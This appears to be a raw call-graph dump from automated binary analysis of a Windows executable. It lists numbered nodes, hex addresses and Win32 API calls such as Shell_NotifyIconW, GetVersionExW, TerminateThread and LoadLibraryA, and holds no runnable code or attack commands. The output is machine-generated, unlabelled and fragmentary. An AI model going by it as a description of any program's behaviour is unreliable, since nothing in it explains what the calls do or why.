98591->98617 98593 fb0fe6 Mailbox 59 API calls 98594 f945eb 98593->98594 98594->98530 98596 f94230 59 API calls Mailbox 98594->98596 98595 f9454f 98595->98593 98595->98594 98596->98524 98597->98530 98598->98530 98599->98530 98600->98501 98601->98530 98602->98535 98603->98536 98605 fef92e __wsetenvp 98604->98605 98606 fef96d 98605->98606 98608 fef963 98605->98608 98610 fefa14 98605->98610 98606->98555 98606->98560 98608->98606 98613 fa14db 61 API calls 98608->98613 98610->98606 98614 fa14db 61 API calls 98610->98614 98611->98558 98612->98561 98613->98608 98614->98610 98615->98576 98616->98590 98618 f94659 Mailbox 98617->98618 98619 fcd6ec 98618->98619 98622 f94663 98618->98622 98620 fb0fe6 Mailbox 59 API calls 98619->98620 98624 fcd6f8 98620->98624 98621 f9466a 98621->98595 98622->98621 98625 f95190 59 API calls Mailbox 98622->98625 98624->98624 98625->98622 98636 ff4ce2 98626->98636 98628 ff4195 Process32NextW 98629 ff4244 CloseHandle 98628->98629 98631 ff418e Mailbox 98628->98631 98629->98402 98630 fa1207 59 API calls 98630->98631 98631->98628 98631->98629 98631->98630 98632 fa1a36 59 API calls 98631->98632 98642 fb0119 59 API calls Mailbox 98631->98642 98643 fa17e0 59 API calls Mailbox 98631->98643 98644 fa151f 61 API calls 98631->98644 98632->98631 98637 ff4d09 98636->98637 98641 ff4cf0 98636->98641 98646 fb37c3 59 API calls __wcstoi64 98637->98646 98640 ff4d0f 98640->98631 98641->98637 98641->98640 98645 fb385c GetStringTypeW _iswctype 98641->98645 98642->98631 98643->98631 98644->98631 98645->98641 98646->98640 98648 fb0fe6 Mailbox 59 API calls 98647->98648 98649 f95285 98648->98649 98650 f95294 98649->98650 98651 fa1a36 59 API calls 98649->98651 98650->98407 98651->98650 98653 fb3139 98652->98653 98654 fb31ae 98652->98654 98661 fb315e 98653->98661 98685 fb8d58 58 API calls __getptd_noexit 98653->98685 98687 fb31c0 60 API calls 3 library calls 98654->98687 98657 fb31bb 98657->98418 98658 fb3145 98686 fb8fe6 9 API calls __ftell_nolock 98658->98686 98660 fb3150 98660->98418 98661->98418 98663 fa59fe _memset 98662->98663 98688 fa5800 98663->98688 98665 fa5a83 98668 fa5ab9 Shell_NotifyIconW 98665->98668 98669 fa5a9d Shell_NotifyIconW 98665->98669 98670 fa5aab 98668->98670 98669->98670 98692 fa56f8 98670->98692 98672 fa5ab2 98672->98418 98674 fa5b25 98673->98674 98675 fa5ad5 _memset 98673->98675 98674->98418 98676 fa5af4 Shell_NotifyIconW 98675->98676 98676->98674 98677->98418 98679 fb0fe6 Mailbox 59 API calls 98678->98679 98680 fa1652 98679->98680 98681 fb0fe6 Mailbox 59 API calls 98680->98681 98682 fa1660 98681->98682 98682->98418 98683->98418 98684->98418 98685->98658 98686->98660 98687->98657 98689 fa581c 98688->98689 98690 fa5810 98688->98690 98689->98690 98691 fa5821 DestroyIcon 98689->98691 98690->98665 98722 ff34dd 62 API calls _W_store_winword 98690->98722 98691->98690 98693 fa57fa Mailbox 98692->98693 98694 fa5715 98692->98694 98693->98672 98695 fa162d 59 API calls 98694->98695 98696 fa5723 98695->98696 98697 fe0c4c LoadStringW 98696->98697 98698 fa5730 98696->98698 98701 fe0c66 98697->98701 98699 fa1821 59 API calls 98698->98699 98700 fa5745 98699->98700 98702 fa5752 98700->98702 98708 fe0c74 98700->98708 98703 fa1c9c 59 API calls 98701->98703 98702->98701 98704 fa5760 98702->98704 98709 fa5778 _memset _wcscpy 98703->98709 98705 fa1900 59 API calls 98704->98705 98706 fa576a 98705->98706 98723 fa17e0 59 API calls Mailbox 98706->98723 98708->98709 98710 fa1207 59 API calls 98708->98710 98719 fe0cb7 Mailbox 98708->98719 98711 fa57e0 Shell_NotifyIconW 98709->98711 98712 fe0c9e 98710->98712 98711->98693 98724 ff0252 60 API calls Mailbox 98712->98724 98715 fe0ca9 98725 fa17e0 59 API calls Mailbox 98715->98725 98716 fe0cd6 98718 fa1900 59 API calls 98716->98718 98720 fe0ce7 98718->98720 98726 fb38c8 83 API calls 3 library calls 98719->98726 98721 fa1900 59 API calls 98720->98721 98721->98709 98722->98665 98723->98709 98724->98715 98725->98719 98726->98716 98728 100a970 98727->98728 98729 100a918 98727->98729 98728->98428 98730 fb0fe6 Mailbox 59 API calls 98729->98730 98733 100a93a 98730->98733 98731 fb0fe6 Mailbox 59 API calls 98731->98733 98733->98728 98733->98731 98801 fe715b 59 API calls Mailbox 98733->98801 98735 ff78ac 98734->98735 98737 ff78e3 98734->98737 98736 fb0fe6 Mailbox 59 API calls 98735->98736 98735->98737 98736->98737 98738 fe6ebc 98737->98738 98739 fe6f06 98738->98739 98743 fe6f1c Mailbox 98738->98743 98740 fa1a36 59 API calls 98739->98740 98740->98743 98741 fe6f5a 98802 f9a820 98741->98802 98742 fe6f47 98744 100c355 266 API calls 98742->98744 98743->98741 98743->98742 98750 fe6f53 98744->98750 98747 fe7002 98747->98455 98748 fe6f91 98749 fe6fdc 98748->98749 98748->98750 98752 fe6fc1 98748->98752 98749->98750 98824 ffa48d 89 API calls 4 library calls 98749->98824 98825 fe6cf1 59 API calls Mailbox 98750->98825 98819 fe706d 98752->98819 98754->98455 98755->98438 98756->98443 98841 fa3740 98757->98841 98760 fd30b6 98930 ffa48d 89 API calls 4 library calls 98760->98930 98761 f9b07f 98761->98760 98763 fd30d4 98761->98763 98794 f9bb86 98761->98794 98796 f9b132 Mailbox _memmove 98761->98796 98931 ffa48d 89 API calls 4 library calls 98763->98931 98765 fd318a 98798 f9b4dd 98765->98798 98933 ffa48d 89 API calls 4 library calls 98765->98933 98767 fd355e 98767->98798 98961 ffa48d 89 API calls 4 library calls 98767->98961 98771 fd3106 98771->98765 98932 f9a9de 266 API calls 98771->98932 98774 f93b31 59 API calls 98774->98796 98775 f953b0 266 API calls 98775->98796 98776 fe730a 59 API calls 98776->98796 98779 fd3418 98780 f953b0 266 API calls 98779->98780 98782 fd3448 98780->98782 98782->98798 98955 f939be 98782->98955 98786 f93c30 68 API calls 98786->98796 98787 fd31c3 98934 ffa48d 89 API calls 4 library calls 98787->98934 98788 fd346f 98959 ffa48d 89 API calls 4 library calls 98788->98959 98791 f9523c 59 API calls 98791->98796 98793 fa1c9c 59 API calls 98793->98796 98929 ffa48d 89 API calls 4 library calls 98794->98929 98795 fb0fe6 59 API calls Mailbox 98795->98796 98796->98767 98796->98771 98796->98774 98796->98775 98796->98776 98796->98779 98796->98786 98796->98787 98796->98788 98796->98791 98796->98793 98796->98794 98796->98795 98796->98798 98846 f93add 98796->98846 98853 f9bc70 98796->98853 98927 f93a40 59 API calls Mailbox 98796->98927 98928 f95190 59 API calls Mailbox 98796->98928 98935 fe6c62 59 API calls 2 library calls 98796->98935 98936 100a9c3 85 API calls Mailbox 98796->98936 98937 fe6c1e 59 API calls Mailbox 98796->98937 98938 ff5ef2 68 API calls 98796->98938 98939 f93ea3 98796->98939 98960 ffa12a 59 API calls 98796->98960 98798->98455 98799->98456 98800->98460 98801->98733 98803 fd2d51 98802->98803 98806 f9a84c 98802->98806 98827 ffa48d 89 API calls 4 library calls 98803->98827 98805 fd2d62 98805->98748 98807 fd2d6a 98806->98807 98815 f9a888 _memmove 98806->98815 98828 ffa48d 89 API calls 4 library calls 98807->98828 98810 fb0fe6 59 API calls Mailbox 98810->98815 98811 f9a975 98811->98748 98812 fd2dae 98829 f9a9de 266 API calls 98812->98829 98813 f953b0 266 API calls 98813->98815 98815->98810 98815->98811 98815->98812 98815->98813 98816 fd2dc8 98815->98816 98818 f9a962 98815->98818 98816->98811 98830 ffa48d 89 API calls 4 library calls 98816->98830 98818->98811 98826 100a9c3 85 API calls Mailbox 98818->98826 98820 fe7085 98819->98820 98822 100f1b2 91 API calls 98820->98822 98831 100495b 98820->98831 98821 fe70d9 98821->98750 98822->98821 98824->98750 98825->98747 98826->98811 98827->98805 98828->98811 98829->98816 98830->98811 98832 fb0fe6 Mailbox 59 API calls 98831->98832 98833 100496c 98832->98833 98834 fa433f 59 API calls 98833->98834 98835 1004976 98834->98835 98836 f94d37 84 API calls 98835->98836 98837 100498d GetEnvironmentVariableW 98836->98837 98840 ff7a51 59 API calls Mailbox 98837->98840 98839 10049aa 98839->98821 98840->98839 98842 fa374f 98841->98842 98845 fa376a 98841->98845 98843 fa1aa4 59 API calls 98842->98843 98844 fa3757 CharUpperBuffW 98843->98844 98844->98845 98845->98761 98847 fcd3cd 98846->98847 98848 f93aee 98846->98848 98849 fb0fe6 Mailbox 59 API calls 98848->98849 98850 f93af5 98849->98850 98851 f93b16 98850->98851 98962 f93ba5 59 API calls Mailbox 98850->98962 98851->98796 98854 fd359f 98853->98854 98864 f9bc95 98853->98864 99028 ffa48d 89 API calls 4 library calls 98854->99028 98856 f9bf3b 98856->98796 98863 f9c2ca LockWindowUpdate DestroyWindow GetMessageW 98863->98856 98865 f9c2fc 98863->98865 98925 f9bca5 Mailbox 98864->98925 99029 f95376 60 API calls 98864->99029 99030 fe700c 266 API calls 98864->99030 98867 fd4509 TranslateMessage DispatchMessageW GetMessageW 98865->98867 98866 fd36b3 Sleep 98866->98925 98867->98856 98867->98867 98868 f95376 60 API calls 98868->98925 98869 fd405d WaitForSingleObject 98872 fd407d GetExitCodeProcess CloseHandle 98869->98872 98869->98925 98870 f9bf54 timeGetTime 98870->98925 98881 f9c36b 98872->98881 98873 f9c210 Sleep 98907 f9c1fa Mailbox 98873->98907 98874 fa1c9c 59 API calls 98874->98925 98875 fa1207 59 API calls 98875->98907 98876 fd43a9 Sleep 98876->98907 98877 fb0fe6 59 API calls Mailbox 98877->98925 98879 f96cd8 244 API calls 98879->98925 98881->98796 98882 f9c324 timeGetTime 99027 f95376 60 API calls 98882->99027 98883 fb0859 timeGetTime 98883->98907 98885 ff4148 66 API calls 98885->98907 98886 f94d37 84 API calls 98886->98925 98887 fd4440 GetExitCodeProcess 98892 fd446c CloseHandle 98887->98892 98893 fd4456 WaitForSingleObject 98887->98893 98889 1016562 110 API calls 98889->98907 98890 f96d79 109 API calls 98890->98925 98892->98907 98893->98892 98893->98925 98894 fd38aa Sleep 98894->98925 98895 fd44c8 Sleep 98895->98925 98898 fa1a36 59 API calls 98898->98907 98901 f93ea3 68 API calls 98901->98907 98903 f9c26d 98906 fa1a36 59 API calls 98903->98906 98904 f9b020 244 API calls 98904->98925 98909 f9bf25 Mailbox 98906->98909 98907->98873 98907->98875 98907->98881 98907->98883 98907->98885 98907->98887 98907->98889 98907->98894 98907->98895 98907->98898 98907->98901 98907->98925 99037 ff2baf 60 API calls 98907->99037 99038 f95376 60 API calls 98907->99038 99039 f96cd8 266 API calls 98907->99039 99040 fe70e2 59 API calls 98907->99040 99041 ff57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98907->99041 98908 100c355 244 API calls 98908->98925 98909->98856 99010 f9c460 98909->99010 98910 ffa48d 89 API calls 98910->98925 98912 f95190 59 API calls Mailbox 98912->98925 98913 f9a820 244 API calls 98913->98925 98914 f953b0 244 API calls 98914->98925 98915 f939be 68 API calls 98915->98925 98917 fa1a36 59 API calls 98917->98925 98918 fe6cf1 59 API calls Mailbox 98918->98925 98919 fd3e13 VariantClear 98919->98925 98920 fd3ea9 VariantClear 98920->98925 98921 f941c4 59 API calls Mailbox 98921->98925 98922 fd3c57 VariantClear 98922->98925 98923 fe7aad 59 API calls 98923->98925 98924 f93ea3 68 API calls 98924->98925 98925->98866 98925->98868 98925->98869 98925->98870 98925->98873 98925->98874 98925->98876 98925->98877 98925->98879 98925->98881 98925->98882 98925->98886 98925->98890 98925->98903 98925->98904 98925->98907 98925->98908 98925->98909 98925->98910 98925->98912 98925->98913 98925->98914 98925->98915 98925->98917 98925->98918 98925->98919 98925->98920 98925->98921 98925->98922 98925->98923 98925->98924 98926 100e60c 130 API calls 98925->98926 98963 f952b0 98925->98963 98972 f99a00 98925->98972 98979 f99c80 98925->98979 99031 1016655 59 API calls 98925->99031 99032 ffa058 59 API calls Mailbox 98925->99032 99033 fee0aa 59 API calls 98925->99033 99034 fe6c62 59 API calls 2 library calls 98925->99034 99035 f938ff 59 API calls 98925->99035 99036 f93a40 59 API calls Mailbox 98925->99036 98926->98925 98927->98796 98928->98796 98929->98760 98930->98798 98931->98798 98932->98765 98933->98798 98934->98798 98935->98796 98936->98796 98937->98796 98938->98796 99102 f93c30 98939->99102 98941 f93eb3 98942 f93f2d 98941->98942 98943 f93ebd 98941->98943 99111 f9523c 59 API calls 98942->99111 98944 fb0fe6 Mailbox 59 API calls 98943->98944 98946 f93ece 98944->98946 98947 f93edc 98946->98947 98948 fa1207 59 API calls 98946->98948 98949 f93eeb 98947->98949 99109 fa1bcc 59 API calls 2 library calls 98947->99109 98948->98947 98951 fb0fe6 Mailbox 59 API calls 98949->98951 98952 f93ef5 98951->98952 99110 f93bc8 68 API calls 98952->99110 98954 f93f1d 98954->98796 98956 f939c9 98955->98956 98957 f93ea3 68 API calls 98956->98957 98958 f939f0 98956->98958 98957->98958 98958->98788 98959->98798 98960->98796 98961->98798 98962->98851 98964 f952c6 98963->98964 98966 f95313 98963->98966 98965 f952d3 PeekMessageW 98964->98965 98964->98966 98965->98966 98967 f952ec 98965->98967 98966->98967 98969 fcdf68 TranslateAcceleratorW 98966->98969 98970 f9533e PeekMessageW 98966->98970 98971 f95352 TranslateMessage DispatchMessageW 98966->98971 99042 f9359e 98966->99042 98967->98925 98969->98966 98969->98970 98970->98966 98970->98967 98971->98970 98973 f99a1d 98972->98973 98974 f99a31 98972->98974 99047 f994e0 98973->99047 99081 ffa48d 89 API calls 4 library calls 98974->99081 98976 f99a28 98976->98925 98978 fd2478 98978->98978 98980 f99cb5 98979->98980 98981 fd247d 98980->98981 98983 f99d1f 98980->98983 98994 f99d79 98980->98994 98982 f953b0 266 API calls 98981->98982 98984 fd2492 98982->98984 98987 fa1207 59 API calls 98983->98987 98983->98994 98992 f99f50 Mailbox 98984->98992 99091 ffa48d 89 API calls 4 library calls 98984->99091 98985 fa1207 59 API calls 98985->98994 98988 fd24d8 98987->98988 98990 fb2f70 __cinit 67 API calls 98988->98990 98989 fb2f70 __cinit 67 API calls 98989->98994 98990->98994 98991 fd24fa 98991->98925 98993 f939be 68 API calls 98992->98993 98996 f953b0 266 API calls 98992->98996 98997 ffa48d 89 API calls 98992->98997 98999 f94230 59 API calls 98992->98999 99004 f9a775 98992->99004 99009 f9a058 98992->99009 99090 fa1bcc 59 API calls 2 library calls 98992->99090 99093 fe7aad 59 API calls 98992->99093 99094 100ccac 266 API calls 98992->99094 99095 100bc26 266 API calls Mailbox 98992->99095 99097 f95190 59 API calls Mailbox 98992->99097 99098 1009ab0 266 API calls Mailbox 98992->99098 98993->98992 98994->98985 98994->98989 98994->98991 98994->98992 98998 f99f3a 98994->98998 98996->98992 98997->98992 98998->98992 99092 ffa48d 89 API calls 4 library calls 98998->99092 98999->98992 99003 fd27f9 99003->98925 99096 ffa48d 89 API calls 4 library calls 99004->99096 99009->98925 99014 f9c46d 99010->99014 99099 fb02d4 InternetCloseHandle InternetCloseHandle WaitForSingleObject 99010->99099 99012 f9c2b6 99012->98856 99015 f9c483 99012->99015 99013 ff77eb 7 API calls Mailbox 99013->99014 99014->99012 99014->99013 99016 fa1a36 59 API calls 99015->99016 99017 f9c4ad 99016->99017 99018 f93ea3 68 API calls 99017->99018 99019 f9c4c2 Mailbox 99018->99019 99020 fa1a36 59 API calls 99019->99020 99021 f9c4ef 99020->99021 99022 f93ea3 68 API calls 99021->99022 99025 f9c500 Mailbox 99022->99025 99023 f9c524 99023->98863 99025->99023 99100 f95376 60 API calls 99025->99100 99101 fe700c 266 API calls 99025->99101 99027->98925 99028->98864 99029->98864 99030->98864 99031->98925 99032->98925 99033->98925 99034->98925 99035->98925 99036->98925 99037->98907 99038->98907 99039->98907 99040->98907 99041->98907 99043 f935e2 99042->99043 99046 f935b0 99042->99046 99043->98966 99044 f935d5 IsDialogMessageW 99044->99043 99044->99046 99045 fcd273 GetClassLongW 99045->99044 99045->99046 99046->99043 99046->99044 99046->99045 99048 f953b0 266 API calls 99047->99048 99049 f9951f 99048->99049 99050 fd2001 99049->99050 99064 f99527 _memmove 99049->99064 99083 f95190 59 API calls Mailbox 99050->99083 99052 fd22c0 99089 ffa48d 89 API calls 4 library calls 99052->99089 99054 fd22de 99054->99054 99055 f99583 99055->98976 99056 f99944 99059 fb0fe6 Mailbox 59 API calls 99056->99059 99057 f9986a 99060 f9987f 99057->99060 99061 fd22b1 99057->99061 99058 fb0fe6 59 API calls Mailbox 99058->99064 99072 f996e3 _memmove 99059->99072 99062 fb0fe6 Mailbox 59 API calls 99060->99062 99088 100a983 59 API calls 99061->99088 99074 f9977d 99062->99074 99064->99052 99064->99055 99064->99056 99064->99058 99065 f996cf 99064->99065 99079 f99741 99064->99079 99065->99056 99067 f996dc 99065->99067 99066 fb0fe6 Mailbox 59 API calls 99070 f9970e 99066->99070 99069 fb0fe6 Mailbox 59 API calls 99067->99069 99068 fd22a0 99087 ffa48d 89 API calls 4 library calls 99068->99087 99069->99072 99070->99079 99082 f9cca0 266 API calls 99070->99082 99072->99066 99072->99070 99072->99079 99074->98976 99076 fd2278 99086 ffa48d 89 API calls 4 library calls 99076->99086 99078 fd2253 99085 ffa48d 89 API calls 4 library calls 99078->99085 99079->99057 99079->99068 99079->99074 99079->99076 99079->99078 99084 f98180 266 API calls 99079->99084 99081->98978 99082->99079 99083->99056 99084->99079 99085->99074 99086->99074 99087->99074 99088->99052 99089->99054 99090->98992 99091->98992 99092->98992 99093->98992 99094->98992 99095->98992 99096->99003 99097->98992 99098->98992 99099->99014 99100->99025 99101->99025 99103 f93e11 99102->99103 99104 f93c43 99102->99104 99103->98941 99105 fa1207 59 API calls 99104->99105 99108 f93c54 99104->99108 99106 f93e73 99105->99106 99107 fb2f70 __cinit 67 API calls 99106->99107 99107->99108 99108->98941 99109->98949 99110->98954 99111->98954 99112->98471 99113 f91016 99118 fa5ce7 99113->99118 99116 fb2f70 __cinit 67 API calls 99117 f91025 99116->99117 99119 fb0fe6 Mailbox 59 API calls 99118->99119 99120 fa5cef 99119->99120 99121 f9101b 99120->99121 99125 fa5f39 99120->99125 99121->99116 99126 fa5f42 99125->99126 99127 fa5cfb 99125->99127 99128 fb2f70 __cinit 67 API calls 99126->99128 99129 fa5d13 99127->99129 99128->99127 99130 fa1207 59 API calls 99129->99130 99131 fa5d2b GetVersionExW 99130->99131 99132 fa1821 59 API calls 99131->99132 99133 fa5d6e 99132->99133 99134 fa1981 59 API calls 99133->99134 99139 fa5d9b 99133->99139 99135 fa5d8f 99134->99135 99136 fa133d 59 API calls 99135->99136 99136->99139 99137 fa5e00 GetCurrentProcess IsWow64Process 99138 fa5e19 99137->99138 99141 fa5e98 GetSystemInfo 99138->99141 99142 fa5e2f 99138->99142 99139->99137 99140 fe1098 99139->99140 99144 fa5e65 99141->99144 99153 fa55f0 99142->99153 99144->99121 99146 fa5e8c GetSystemInfo 99149 fa5e56 99146->99149 99147 fa5e41 99148 fa55f0 2 API calls 99147->99148 99150 fa5e49 GetNativeSystemInfo 99148->99150 99149->99144 99151 fa5e5c FreeLibrary 99149->99151 99150->99149 99151->99144 99154 fa5619 99153->99154 99155 fa55f9 LoadLibraryA 99153->99155 99154->99146 99154->99147 99155->99154 99156 fa560a GetProcAddress 99155->99156 99156->99154 99157 f99a88 99160 f986e0 99157->99160 99161 f986fd 99160->99161 99162 fd0fad 99161->99162 99163 fd0ff8 99161->99163 99175 f98724 99161->99175 99166 fd0fb5 99162->99166 99169 fd0fc2 99162->99169 99162->99175 99195 100aad0 266 API calls __cinit 99163->99195 99164 f95278 59 API calls 99164->99175 99193 100b0e4 266 API calls 99166->99193 99167 fb2f70 __cinit 67 API calls 99167->99175 99174 f9898d 99169->99174 99194 100b58c 266 API calls 3 library calls 99169->99194 99172 fd1289 99172->99172 99173 f93c30 68 API calls 99173->99175 99179 f98a17 99174->99179 99199 ffa48d 89 API calls 4 library calls 99174->99199 99175->99164 99175->99167 99175->99173 99175->99174 99176 fd11af 99175->99176 99175->99179 99180 f939be 68 API calls 99175->99180 99185 f93f42 68 API calls 99175->99185 99186 f953b0 266 API calls 99175->99186 99187 fa1c9c 59 API calls 99175->99187 99189 f93938 68 API calls 99175->99189 99190 f9855e 266 API calls 99175->99190 99191 f984e2 89 API calls 99175->99191 99192 f9835f 266 API calls 99175->99192 99196 f9523c 59 API calls 99175->99196 99197 fe73ab 59 API calls 99175->99197 99198 100ae3b 89 API calls 99176->99198 99180->99175 99185->99175 99186->99175 99187->99175 99189->99175 99190->99175 99191->99175 99192->99175 99193->99169 99194->99174 99195->99175 99196->99175 99197->99175 99198->99174 99199->99172 99200 fcb7ad 99203 f9ad98 99200->99203 99204 fd2f63 DestroyWindow 99203->99204 99205 f9add7 mciSendStringW 99203->99205 99218 fd2f6f 99204->99218 99206 f9afc0 99205->99206 99207 f9adf3 99205->99207 99206->99207 99209 f9afcf UnregisterHotKey 99206->99209 99208 f9ae01 99207->99208 99207->99218 99239 f9c71f 99208->99239 99209->99206 99211 fd2fb4 99216 fd2fc7 FreeLibrary 99211->99216 99217 fd2fd8 99211->99217 99213 fd2f8d FindClose 99213->99218 99214 f9ae16 99214->99217 99227 f9ae24 99214->99227 99216->99211 99219 fd2fec VirtualFree 99217->99219 99220 fd301a 99217->99220 99218->99211 99218->99213 99250 fa42cf 99218->99250 99219->99217 99222 f9ae91 99220->99222 99243 ff7079 99220->99243 99221 f9ae80 CoUninitialize 99221->99220 99221->99222 99223 f9ae9c 99222->99223 99224 fd3033 99222->99224 99225 f9aeac Mailbox 99223->99225 99228 fd3042 99224->99228 99254 ffa240 CloseHandle 99224->99254 99248 fafef1 61 API calls Mailbox 99225->99248 99227->99221 99233 fd3056 99228->99233 99255 fed5cb 59 API calls Mailbox 99228->99255 99230 f9aec2 Mailbox 99249 fb052f 59 API calls Mailbox 99230->99249 99240 f9c72e Mailbox 99239->99240 99241 f9ae08 99240->99241 99256 fee0aa 59 API calls 99240->99256 99241->99211 99241->99214 99257 ff77eb 99243->99257 99246 fb105c 99247 ff70a1 DeleteCriticalSection 99246->99247 99247->99222 99248->99230 99251 fa42e8 99250->99251 99252 fa42d9 99250->99252 99251->99252 99253 fa42ed CloseHandle 99251->99253 99252->99218 99253->99252 99254->99224 99255->99228 99256->99240 99258 ff7087 CloseHandle CloseHandle 99257->99258 99259 ff77f7 InterlockedExchange 99257->99259 99258->99246 99259->99258 99260 ff780b EnterCriticalSection TerminateThread WaitForSingleObject 99259->99260 99263 ff71f0 CloseHandle 99260->99263 99262 ff7836 InterlockedExchange LeaveCriticalSection 99262->99258 99263->99262 99264 f99a6c 99267 f9829c 99264->99267 99266 f99a78 99268 f98308 99267->99268 99269 f982b4 99267->99269 99274 f98331 99268->99274 99277 ffa48d 89 API calls 4 library calls 99268->99277 99269->99268 99270 f953b0 266 API calls 99269->99270 99273 f982eb 99270->99273 99272 fd0ed8 99272->99272 99273->99274 99276 f9523c 59 API calls 99273->99276 99274->99266 99276->99268 99277->99272 99278 fb7e83 99279 fb7e8f ___lock_fhandle 99278->99279 99315 fba038 GetStartupInfoW 99279->99315 99282 fb7e94 99317 fb8dac GetProcessHeap 99282->99317 99283 fb7eec 99284 fb7ef7 99283->99284 99403 fb7fd3 58 API calls 3 library calls 99283->99403 99318 fb9d16 99284->99318 99287 fb7efd 99288 fb7f08 __RTC_Initialize 99287->99288 99404 fb7fd3 58 API calls 3 library calls 99287->99404 99339 fbd802 99288->99339 99291 fb7f17 99292 fb7f23 GetCommandLineW 99291->99292 99405 fb7fd3 58 API calls 3 library calls 99291->99405 99358 fc5153 GetEnvironmentStringsW 99292->99358 99295 fb7f22 99295->99292 99298 fb7f3d 99299 fb7f48 99298->99299 99406 fb32e5 58 API calls 3 library calls 99298->99406 99368 fc4f88 99299->99368 99302 fb7f4e 99303 fb7f59 99302->99303 99407 fb32e5 58 API calls 3 library calls 99302->99407 99382 fb331f 99303->99382 99306 fb7f61 99308 fb7f6c __wwincmdln 99306->99308 99408 fb32e5 58 API calls 3 library calls 99306->99408 99388 fa5f8b 99308->99388 99310 fb7f80 99311 fb7f8f 99310->99311 99400 fb3588 99310->99400 99409 fb3310 58 API calls _doexit 99311->99409 99314 fb7f94 ___lock_fhandle 99316 fba04e 99315->99316 99316->99282 99317->99283 99410 fb33b7 36 API calls 2 library calls 99318->99410 99320 fb9d1b 99411 fb9f6c InitializeCriticalSectionAndSpinCount ___lock_fhandle 99320->99411 99322 fb9d20 99323 fb9d24 99322->99323 99413 fb9fba TlsAlloc 99322->99413 99412 fb9d8c 61 API calls 2 library calls 99323->99412 99326 fb9d29 99326->99287 99327 fb9d36 99327->99323 99328 fb9d41 99327->99328 99414 fb8a05 99328->99414 99331 fb9d83 99422 fb9d8c 61 API calls 2 library calls 99331->99422 99334 fb9d88 99334->99287 99335 fb9d62 99335->99331 99336 fb9d68 99335->99336 99421 fb9c63 58 API calls 4 library calls 99336->99421 99338 fb9d70 GetCurrentThreadId 99338->99287 99340 fbd80e ___lock_fhandle 99339->99340 99341 fb9e3b __lock 58 API calls 99340->99341 99342 fbd815 99341->99342 99343 fb8a05 __calloc_crt 58 API calls 99342->99343 99344 fbd826 99343->99344 99345 fbd891 GetStartupInfoW 99344->99345 99346 fbd831 ___lock_fhandle @_EH4_CallFilterFunc@8 99344->99346 99352 fbd8a6 99345->99352 99355 fbd9d5 99345->99355 99346->99291 99347 fbda9d 99436 fbdaad LeaveCriticalSection _doexit 99347->99436 99349 fb8a05 __calloc_crt 58 API calls 99349->99352 99350 fbda22 GetStdHandle 99350->99355 99351 fbda35 GetFileType 99351->99355 99352->99349 99354 fbd8f4 99352->99354 99352->99355 99353 fbd928 GetFileType 99353->99354 99354->99353 99354->99355 99434 fba05b InitializeCriticalSectionAndSpinCount 99354->99434 99355->99347 99355->99350 99355->99351 99435 fba05b InitializeCriticalSectionAndSpinCount 99355->99435 99359 fb7f33 99358->99359 99360 fc5164 99358->99360 99364 fc4d4b GetModuleFileNameW 99359->99364 99437 fb8a4d 58 API calls 2 library calls 99360->99437 99362 fc518a _memmove 99363 fc51a0 FreeEnvironmentStringsW 99362->99363 99363->99359 99365 fc4d7f _wparse_cmdline 99364->99365 99367 fc4dbf _wparse_cmdline 99365->99367 99438 fb8a4d 58 API calls 2 library calls 99365->99438 99367->99298 99369 fc4fa1 __wsetenvp 99368->99369 99373 fc4f99 99368->99373 99370 fb8a05 __calloc_crt 58 API calls 99369->99370 99378 fc4fca __wsetenvp 99370->99378 99371 fc5021 99372 fb2f85 _free 58 API calls 99371->99372 99372->99373 99373->99302 99374 fb8a05 __calloc_crt 58 API calls 99374->99378 99375 fc5046 99377 fb2f85 _free 58 API calls 99375->99377 99377->99373 99378->99371 99378->99373 99378->99374 99378->99375 99379 fc505d 99378->99379 99439 fc4837 58 API calls __ftell_nolock 99378->99439 99440 fb8ff6 IsProcessorFeaturePresent 99379->99440 99381 fc5069 99381->99302 99384 fb332b __IsNonwritableInCurrentImage 99382->99384 99463 fba701 99384->99463 99385 fb3349 __initterm_e 99386 fb2f70 __cinit 67 API calls 99385->99386 99387 fb3368 __cinit __IsNonwritableInCurrentImage 99385->99387 99386->99387 99387->99306 99389 fa5fa5 99388->99389 99399 fa6044 99388->99399 99390 fa5fdf IsThemeActive 99389->99390 99466 fb359c 99390->99466 99394 fa600b 99478 fa5f00 SystemParametersInfoW SystemParametersInfoW 99394->99478 99396 fa6017 99479 fa5240 99396->99479 99398 fa601f SystemParametersInfoW 99398->99399 99399->99310 100510 fb3459 99400->100510 99402 fb3597 99402->99311 99403->99284 99404->99288 99405->99295 99409->99314 99410->99320 99411->99322 99412->99326 99413->99327 99416 fb8a0c 99414->99416 99417 fb8a47 99416->99417 99419 fb8a2a 99416->99419 99423 fc5426 99416->99423 99417->99331 99420 fba016 TlsSetValue 99417->99420 99419->99416 99419->99417 99431 fba362 Sleep 99419->99431 99420->99335 99421->99338 99422->99334 99424 fc5431 99423->99424 99430 fc544c 99423->99430 99425 fc543d 99424->99425 99424->99430 99432 fb8d58 58 API calls __getptd_noexit 99425->99432 99427 fc545c HeapAlloc 99428 fc5442 99427->99428 99427->99430 99428->99416 99430->99427 99430->99428 99433 fb35d1 DecodePointer 99430->99433 99431->99419 99432->99428 99433->99430 99434->99354 99435->99355 99436->99346 99437->99362 99438->99367 99439->99378 99441 fb9001 99440->99441 99446 fb8e89 99441->99446 99445 fb901c 99445->99381 99447 fb8ea3 _memset ___raise_securityfailure 99446->99447 99448 fb8ec3 IsDebuggerPresent 99447->99448 99454 fba385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99448->99454 99451 fb8f87 ___raise_securityfailure 99455 fbc826 99451->99455 99452 fb8faa 99453 fba370 GetCurrentProcess TerminateProcess 99452->99453 99453->99445 99454->99451 99456 fbc82e 99455->99456 99457 fbc830 IsProcessorFeaturePresent 99455->99457 99456->99452 99459 fc5b3a 99457->99459 99462 fc5ae9 5 API calls 2 library calls 99459->99462 99461 fc5c1d 99461->99452 99462->99461 99464 fba704 EncodePointer 99463->99464 99464->99464 99465 fba71e 99464->99465 99465->99385 99467 fb9e3b __lock 58 API calls 99466->99467 99468 fb35a7 DecodePointer EncodePointer 99467->99468 99531 fb9fa5 LeaveCriticalSection 99468->99531 99470 fa6004 99471 fb3604 99470->99471 99472 fb3628 99471->99472 99473 fb360e 99471->99473 99472->99394 99473->99472 99532 fb8d58 58 API calls __getptd_noexit 99473->99532 99475 fb3618 99533 fb8fe6 9 API calls __ftell_nolock 99475->99533 99477 fb3623 99477->99394 99478->99396 99480 fa524d __ftell_nolock 99479->99480 99481 fa1207 59 API calls 